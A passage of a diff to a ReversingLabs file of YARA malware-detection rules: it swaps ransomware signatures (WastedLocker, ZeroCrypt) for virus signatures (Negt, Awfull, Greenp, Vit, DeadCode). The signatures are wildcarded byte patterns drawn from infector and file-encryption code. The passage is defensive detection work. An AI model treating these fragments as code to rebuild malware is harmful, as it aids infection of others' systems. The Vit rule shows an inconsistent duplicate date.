+            00 00 6A 00 8D 45 F0 50 6A 04 8D 45 E4 50 FF 75 FC E8 DC 04 00 00 8B 45 E8 03 45 E4 A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 00
+            00 00 00 C7 05 ?? ?? ?? ?? 00 00 00 00 66 C7 05 ?? ?? ?? ?? 00 00 66 C7 05 ?? ?? ?? ?? 00 00 C7 05 ?? ?? ?? ?? 20 00 00
+            E0 6A 00 6A 00 FF 75 EC FF 75 FC E8 9E 04 00 00 6A 00 8D 45 F0 50 6A 28 68 ?? ?? ?? ?? FF 75 FC E8 8F 04 00 00 68 ?? ??
+            ?? ?? E8 61 04 00 00 68 ?? ?? ?? ?? E8 63 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 48 04 00 00 A3 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 33 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 1E 04 00 00
+            A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 09 04 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 F4 03
+            00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 DF 03 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
+            CA 03 00 00 A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 B5 03 00 00 A3 ?? ?? ?? ?? 6A 02 6A 00 6A 00 FF 75 FC E8
+            BA 03 00 00 6A 00 8D 45 F0 50 FF 35 ?? ?? ?? ?? 8D 05 ?? ?? ?? ?? 50 FF 75 FC E8 A5 03 00 00 66 FF 05 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 8B 0D ?? ?? ?? ?? 99 F7 F1 40 F7 E1 03 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A 00 6A 00
         }
-		$remote_connection_3 = {
-            55 89 E5 57 56 53 83 EC ?? 89 4D ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 45 ?? 89 44 24 ?? C7 04 24 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 03 89 45 ?? EB ?? 83 EC ?? 89 45 ?? 85 C0 74 ?? 3D ?? ??
-            ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89
-            44 24 ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 83 7D ?? ??
-            74 ?? BE ?? ?? ?? ?? 8D 7D ?? EB ?? 83 EC ?? 8D 45 ?? 89 04 24 8D 4D ?? E8 ?? ?? ??
-            ?? 83 EC ?? 8B 45 ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C6 ?? 39 75 ?? 72 ?? 8B
-            45 ?? 8B 5C B0 ?? 89 7D ?? B8 ?? ?? ?? ?? 85 DB 74 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 04
-            43 C6 44 24 ?? ?? 89 44 24 ?? 89 1C 24 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 83 EC ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? C1 F8 ?? 69 C0 ?? ?? ??
-            ?? 85 C0 74 ?? 8B 7D ?? 8D 9F ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 47 ?? 3B 47 ??
-            74 ?? 85 C0 74 ?? 8B 55 ?? 89 10 8D 48 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ??
-            8B 45 ?? 83 40 ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 8D 45 ?? 89 04
-            24 E8 ?? ?? ?? ?? 83 EC ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2 ??
-            ?? 89 C3 8B 45 ?? 8D 55 ?? 39 D0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 89 1C 24 E8 ?? ?? ?? ?? 89 C3 EB ?? 53 83 EC ?? 8B 5C 24 ?? 8D 43 ?? 89 04 24 8B
-            0B E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? C7 04 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? 83 C4 ?? 5B C3
+		$negt_body_and_infector_4 = {
+            FF 75 F4 FF 75 FC E8 63 03 00 00 6A 00 8D 45 F0 50 68 F8 00 00 00 68 ?? ?? ?? ?? FF 75 FC E8 51 03 00 00 83 6D F4 0B 6A
+            00 6A 00 FF 75 F4 FF 75 FC E8 38 03 00 00 6A 00 8D 45 F0 50 6A 0B 68 ?? ?? ?? ?? FF 75 FC E8 29 03 00 00 6A 00 6A 20 6A
+            03 6A 00 6A 01 68 00 00 00 80 68 ?? ?? ?? ?? E8 C8 02 00 00 89 45 F8 6A 00 6A 00 6A 00 FF 75 F8 E8 F9 02 00 00 6A 00 8D
+            45 F0 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 F8 E8 D3 02 00 00 8B 75 F0 6A 02 6A 00 6A 00 FF 75 FC E8 CE 02 00 00
+            6A 00 8D 45 F0 50 56 8D 85 ?? ?? ?? ?? 50 FF 75 FC E8 BE 02 00 00 FF 75 FC E8 62 02 00 00 FF 75 F8 E8 5A 02 00 00 59 C9
+            C2 04 00 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 00 01 00 00 FF B5 ?? ?? ?? ?? 6A 00
+            FF 95 ?? ?? ?? ?? 6A 00 6A 20 6A 03 6A 00 6A 01 68 00 00 00 80 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A
+            00 6A 20 6A 02 6A 00 6A 03 68 00 00 00 C0 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 FF B5 ?? ?? ??
+            ?? FF 95 ?? ?? ?? ?? 2D ?? ?? ?? ?? 6A 00 6A 00 50 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 68 00
+            01 00 00 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 FB 00 74 1E 8D 85 ?? ?? ?? ?? 6A 00
+            50 53 FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? EB B7 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
+            FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 C3
+        }
+		$negt_infector = {
+            E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 00 01 00 00 FF B5 ?? ?? ?? ?? 6A 00 FF 95 ??
+            ?? ?? ?? 6A 00 6A 20 6A 03 6A 00 6A 01 68 00 00 00 80 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 6A 20
+            6A 02 6A 00 6A 03 68 00 00 00 C0 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A 00 FF B5 ?? ?? ?? ?? FF 95
+            ?? ?? ?? ?? 2D ?? ?? ?? ?? 6A 00 6A 00 50 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 68 00 01 00 00
+            FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 FB 00 74 1E 8D 85 ?? ?? ?? ?? 6A 00 50 53 FF
+            B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? EB B7 FF B5 ?? ?? ?? ?? FF 95 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 95 ??
+            ?? ?? ?? 6A 00 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 03 85 ?? ?? ?? ?? 50 C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $search_files and $encrypt_files and $remote_connection ) or ( $encrypt_files_2 and $remote_connection and $search_files ) or ( $search_files_2 and $encrypt_files_3 and $remote_connection_2 ) or ( $install_service and $search_files_3 and $encrypt_files_4 ) or ( $search_files_4 and $encrypt_files_5 and $remote_connection_3 ) )
+		uint16( 0 ) == 0x5A4D and ( ( $negt_infector at pe.entry_point ) or ( ( $negt_body_and_infector_1 at pe.entry_point ) and $negt_body_and_infector_2 and $negt_body_and_infector_3 and $negt_body_and_infector_4 ) )
 }
-rule REVERSINGLABS_Win32_Ransomware_Wastedlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Win32_Virus_Awfull : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects WastedLocker ransomware."
+		description = "Yara rule that detects Awfull virus."
 		author = "ReversingLabs"
-		id = "68090960-9878-5836-8caa-bf8f408a474e"
-		date = "2020-12-07"
-		modified = "2020-12-07"
+		id = "34104923-b401-5d39-883b-aa9a5a8e64f3"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Wastedlocker.yara#L1-L86"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0899d3cc3bcea8eae60689a54f34e57bdc52088c879c8420b8e6d0b1969cb186"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/virus/Win32.Virus.Awfull.yara#L3-L33"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "84a4faee4cbbb3387ad25bd9230c6482b8db461bc008312bc782f23e3df2eae3"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "WastedLocker"
+		tc_detection_type = "Virus"
+		tc_detection_name = "Awfull"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$find_files_p1 = {
-            55 8B EC 83 EC ?? 83 65 ?? ?? 57 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 8B F8 85 FF 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 53 8B 5D ?? 8D 04 41 89 45 ??
-            C7 00 ?? ?? ?? ?? 8B 43 ?? 57 51 89 45 ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 89 45 ?? 0F 84
-            ?? ?? ?? ?? 56 8D 47 ?? 66 83 38 ?? 75 ?? 0F B7 4F ?? 66 85 C9 0F 84 ?? ?? ?? ?? 66
-            83 F9 ?? 75 ?? 66 83 7F ?? ?? 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B F0
-            8D 14 0E B8 ?? ?? ?? ?? 3B D0 89 55 ?? 0F 83 ?? ?? ?? ?? F6 07 ?? 0F 85 ?? ?? ?? ??
-            8B 45 ?? 85 C0 74 ?? 83 7F ?? ?? 75 ?? 39 47 ?? 0F 82 ?? ?? ?? ?? 8D 44 36 ?? 50 8D
-            47 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 85 C9 74 ?? 8B 45 ?? 83 C0 ?? 50
-            E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 83 C0 ?? 50 E8
-            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 03 C6 8D 44 00 ?? 83 C0 ?? 50 6A ?? FF
-            35 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? 6A
-            ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 8D 44 00 ?? 50 FF 75 ?? 8D 46 ?? 50 89 76 ?? 89 36 E8
-            ?? ?? ?? ?? 8B 45 ?? 89 46 ?? 8B 45 ?? 89 46 ?? 8B 07 89 46 ?? 8B 47 ?? 89 46 ?? 8B
-        }
-		$find_files_p2 = {
-            47 ?? 89 46 ?? 8B 47 ?? 89 46 ?? 8B 47 ?? 83 C4 ?? 89 46 ?? 83 3B ?? 74 ?? 53 FF 15
-            ?? ?? ?? ?? 8D 43 ?? 8B 48 ?? 89 06 89 4E ?? 89 31 89 70 ?? FF 43 ?? 83 7B ?? ?? 74
-            ?? 8B 43 ?? 83 F8 ?? 75 ?? FF 73 ?? FF 15 ?? ?? ?? ?? 83 3B ?? 0F 84 ?? ?? ?? ?? 53
-            FF 15 ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? EB ?? F6 45 ?? ?? 74 ?? 8D 4C 0E ?? 3B
-            C8 73 ?? 8D 04 36 50 8D 47 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 8D 04 41
-            66 83 60 ?? ?? 83 C4 ?? 83 7D ?? ?? 66 C7 00 ?? ?? 74 ?? 83 C1 ?? 51 8B 4D ?? E8 ??
-            ?? ?? ?? 85 C0 75 ?? 8B 4D ?? FF 75 ?? 8B 45 ?? 53 FF 75 ?? 8D 44 06 ?? FF 75 ?? 50
-            51 E8 ?? ?? ?? ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? F6 45 ?? ??
-            74 ?? 83 65 ?? ?? 83 7D ?? ?? 75 ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 43
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5E 57 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5B EB
-            ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 5F C9 C2
+		$awfull_body = {
+              60 E8 ?? 00 00 00 8B 64 24 08 EB ?? [0-256]
+              33 D2 64 FF 32 64 89 22 33 C0 C7 00 00 00 00 00 33 D2 64 8F 02
+              5A 64 (8B 0D | 67 8B 0E ) 14 00 [0-2] E3 03 FA
+              EB FD 61 E8 00 00 00 00 5D 81 ED ?? ?? ?? ?? 0B ED 74 ??
+              [0-128] (BE | 8B 35) ?? ?? ?? ?? 03 F5 B9 ?? ?? ?? ??
+              56 5F AC F6 D0 AA 49 E3 02 EB F7
         }
-		$encrypt_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 FF 75 ?? 8B 3D ?? ?? ?? ?? FF 75 ?? FF D7 85 C0
-            0F 84 ?? ?? ?? ?? FF 75 ?? 8D 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 89 45 ?? 75 ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 74 ?? F6 C3 ?? 74 ?? 83 E0 ?? 50 FF 75 ?? FF 15 ??
-            ?? ?? ?? 85 C0 75 ?? 33 DB 85 DB 89 5D ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 75 ?? E8 ??
-            ?? ?? ?? 89 45 ?? EB ?? 83 65 ?? ?? 33 C9 39 4D ?? 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 39 4D ?? 74 ?? 8B 45 ?? 8B 10 8B 40 ?? C1 65 ?? ?? 89 55 ?? 89 45
-            ?? EB ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 89 4D ?? 8B 45 ?? 89 45 ?? 89 4D ?? 89 4D ??
-            8B 5D ?? 33 F6 8B 45 ?? 85 C0 89 45 ?? 74 ?? 3B D8 73 ?? 89 5D ?? 2B 45 ?? 89 45 ??
-            75 ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? 8B 7D ?? 8D 45 ?? 50 57 8D 47 ?? 50 FF 75
-            ?? 8B 45 ?? 03 C6 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 03 75 ?? 85 C0 89 45 ?? 0F
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( $awfull_body at pe.entry_point )
+}
+
+rule REVERSINGLABS_Win32_Virus_Greenp : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects Greenp virus."
+		author = "ReversingLabs"
+		id = "5751e91c-652b-59bd-93b8-ece677ad4911"
+		date = "2020-07-15"
+		modified = "2020-07-15"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/virus/Win32.Virus.Greenp.yara#L3-L46"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ca6df34ee2ad9d93e35b0d1a2d4765f681f3981ffe2786bbc822c3090212fd02"
+		score = 75
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Virus"
+		tc_detection_name = "Greenp"
+		tc_detection_factor = 5
+		importance = 25
+
+	strings:
+		$greenp_body_1 = {
+            68 ?? ?? ?? ?? 60 FC E8 4E 05 00 00 E8 31 04 00 00 0F 82 93 00 00 00 80 BD ?? ?? ?? ?? 01 75 63 FF 95 ?? ?? ?? ?? 6A 01
+            50 FF 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A 00 6A 00 FF 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 EC 18 8B FC
+            6A 00 6A 00 6A 00 57 FF 95 ?? ?? ?? ?? 85 C0 74 10 57 FF 95 ?? ?? ?? ?? 57 FF 95 ?? ?? ?? ?? EB DF 68 ?? ?? ?? ?? 6A 00
+            FF 95 ?? ?? ?? ?? 83 C4 18 EB 27 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ?? ?? 85 C0 75 16 8D 85 ?? ?? ?? ?? 50 FF 95 ?? ?? ??
+            ?? 85 C0 74 05 E8 81 00 00 00 61 58 FF E0 ?? E8 04 00 00 00 [4] 8B 3C 24 81 EC 00 01 00 00 8B F4 56 68 00 01 00 00 FF
+            95 ?? ?? ?? ?? AC AA 81 C4 00 01 00 00 FF 95 ?? ?? ?? ?? 83 F8 03 75 2D 83 EC 10 8B F4 56 8D 46 04 50 8D 46 08 50 8D 46
+            0C 50 4F 57 FF 95 ?? ?? ?? ?? 8B 46 04 2B D2 F7 66 08 F7 66 0C 83 C4 10 3D 00 00 40 06 C3 [27] 81 EC ?? ?? ?? ?? 8B F4
+            68 ?? ?? ?? ?? 56 FF 95 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8A 17 88 14 06 40 47 80 FA 00 75 F4 68 ?? ?? ?? ?? 6A 00 FF 95 ??
+            ?? ?? ?? 97 56 57 B9 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 3A 02 00 00 5F B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1
+            8B 57 3C 03 D7 0F B7 5A 14 8D 5C 13 40 8B 72 28 03 72 34 89 B5 ?? ?? ?? ?? C7 42 10 80 67 D5 40 FF 73 10 01 43 10 8B 43
+            10 05 ?? ?? ?? ?? 89 43 08 58 03 43 0C 89 42 28 52 B8 ?? ?? ?? ?? 99 68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 5A 01 43 10 01 42
+            50 81 42 50 ?? ?? ?? ?? 57 C6 85 ?? ?? ?? ?? 01 81 C7 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? B9 ?? ?? ?? ?? FC F3 A4 C6 85 ?? ??
+            ?? ?? 00 5F 5E 6A 00 6A 00 6A 02 6A 00 6A 00 68 00 00 00 C0 56 FF 95 ?? ?? ?? ?? 93 50 8B C4 6A 00 50 B8 ?? ?? ?? ?? 99
         }
-		$encrypt_files_p2 = {
-            85 ?? ?? ?? ?? 2B 5D ?? 75 ?? EB ?? 8B 7D ?? 8B 45 ?? 0B 45 ?? 0F 84 ?? ?? ?? ?? 33
-            C0 3B 45 ?? 77 ?? 72 ?? 3B 5D ?? 73 ?? 8B C3 EB ?? 8B 45 ?? 29 45 ?? 8B 4D ?? 83 5D
-            ?? ?? 0B 4D ?? 75 ?? 8B 4D ?? 89 4D ?? 03 F0 2B D8 0F 85 ?? ?? ?? ?? 8B 45 ?? 8B 4D
-            ?? 0F AC C8 ?? C1 E9 ?? 85 C0 74 ?? B9 ?? ?? ?? ?? F7 E1 29 45 ?? 19 55 ?? 01 45 ??
-            11 55 ?? 83 7D ?? ?? 75 ?? 8D 75 ?? E8 ?? ?? ?? ?? 85 C0 89 45 ?? 0F 84 ?? ?? ?? ??
-            8B 7D ?? 8D 47 ?? 50 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 39 75 ?? 74 ?? 83 7D ??
-            ?? 74 ?? 8B 4D ?? 8B 45 ?? 8B D1 0B D0 74 ?? 0F AC C1 ?? C1 E8 ?? 83 4F ?? ?? 89 4F
-            ?? 89 75 ?? 39 75 ?? 74 ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 39
-            75 ?? 74 ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 85 DB 0F 85
-            ?? ?? ?? ?? E9 ?? ?? ?? ?? 01 75 ?? 83 55 ?? ?? E9 ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF
-            D7 EB ?? FF 15 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 5F 5E 5B C9 C2
+		$greenp_body_2 = {
+            68 ?? ?? ?? ?? 59 F7 F1 40 F7 E1 50 57 53 FF 95 ?? ?? ?? ?? 58 57 FF 95 ?? ?? ?? ?? 53 FF 95 ?? ?? ?? ?? 6A 00 56 FF 95
+            ?? ?? ?? ?? 50 50 8B FC 8D 57 04 2B C0 52 57 50 68 3F 00 0F 00 50 50 50 8D 85 ?? ?? ?? ?? 50 68 02 00 00 80 FF 95 ?? ??
+            ?? ?? 85 C0 75 1E 6A 0C 56 6A 01 6A 00 8D 85 ?? ?? ?? ?? 50 FF 37 FF 95 ?? ?? ?? ?? FF 37 FF 95 ?? ?? ?? ?? 81 C4 ?? ??
+            ?? ?? C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and ( $greenp_body_1 at pe.entry_point ) and $greenp_body_2
 }
-rule REVERSINGLABS_Win32_Ransomware_Zerocrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Linux_Virus_Vit : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects ZeroCrypt ransomware."
+		description = "Yara rule that detects Vit virus."
 		author = "ReversingLabs"
-		id = "89e47d7f-1ac4-570d-8ae1-30f0acc21462"
+		id = "4515fe43-4c5a-521d-82b7-273823f0c64e"
+		date = "2025-06-15"
+		date = "2025-06-15"
+		modified = "2023-06-07"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/virus/Linux.Virus.Vit.yara#L3-L36"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2fba7a081dfca85aee5c7f3b33414b799ed52ca6aa5bbf031da040aaa75acde9"
+		score = 75
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Virus"
+		tc_detection_factor = 5
+		importance = 25
+
+	strings:
+		$vit_entry_point = {
+        55 89 E5 81 EC 40 31 00 00 57 56 50 53 51 52 C7 85 D8 CE FF FF 00 00 00 00 C7 85 D4
+        CE FF FF 00 00 00 00 C7 85 FC CF FF FF CA 08 00 00 C7 85 F8 CF FF FF B8 06 00 00 C7
+        85 F4 CF FF FF AD 08 00 00 C7 85 F0 CF FF FF 50 06 00 00 6A 00 6A 00 8B 45 08 50 E8
+        18 FA FF FF 89 C6 83 C4 0C 85 F6 0F 8C E6 01 00 00 6A 00 68 ?? ?? ?? ?? 56 E8 2E FA
+        FF FF 83 C4 0C 85 C0 0F 8C C4 01 00 00 8B 85 FC CF FF FF 50 8D 85 00 D0 FF FF 50 56
+        E8 2A FA FF FF 89 C2 8B 85 FC CF FF FF 83 C4 0C 39 C2 0F 85 9D 01 00 00 56 E8 E1 F9
+        FF FF BE FF FF FF FF 6A 00 6A 00 E9
+      }
+		$vit_str = "vi324.tmp"
+
+	condition:
+		uint32( 0 ) == 0x464C457F and $vit_entry_point at elf.entry_point and $vit_str
+}
+
+rule REVERSINGLABS_Win32_Virus_Deadcode : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects DeadCode virus."
+		author = "ReversingLabs"
+		id = "89ec2e39-a163-5ba6-9b19-9c94b1923d47"
 		date = "2020-07-15"
 		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.ZeroCrypt.yara#L1-L94"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "947925206ded187eac31c5046d75ab017869ae3f8dc906f2e5536d4db219f108"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/virus/Win32.Virus.DeadCode.yara#L3-L76"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6ac2e48daaed222f0a19afd4d03a02834705e0e3762db3217f68569554171846"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "ZeroCrypt"
+		tc_detection_type = "Virus"
+		tc_detection_name = "DeadCode"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$encrypt_file_1 = {
-            55 8B EC 83 E4 ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 57 A1 ?? ?? ?? ?? 33 C4 50 8D 84 24 ?? ??
-            ?? ?? 64 A3 ?? ?? ?? ?? 8B F2 8B F9 68 ?? ?? ?? ?? 8B D7 8D 4C 24 ?? E8 ?? ?? ?? ??
-            83 C4 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 8B D0 56 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? C6 84 24 ?? ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ?? E8 ?? ?? ?? ??
-            83 C4 ?? 33 C0 C7 44 24 ?? ?? ?? ?? ?? 83 7E ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44
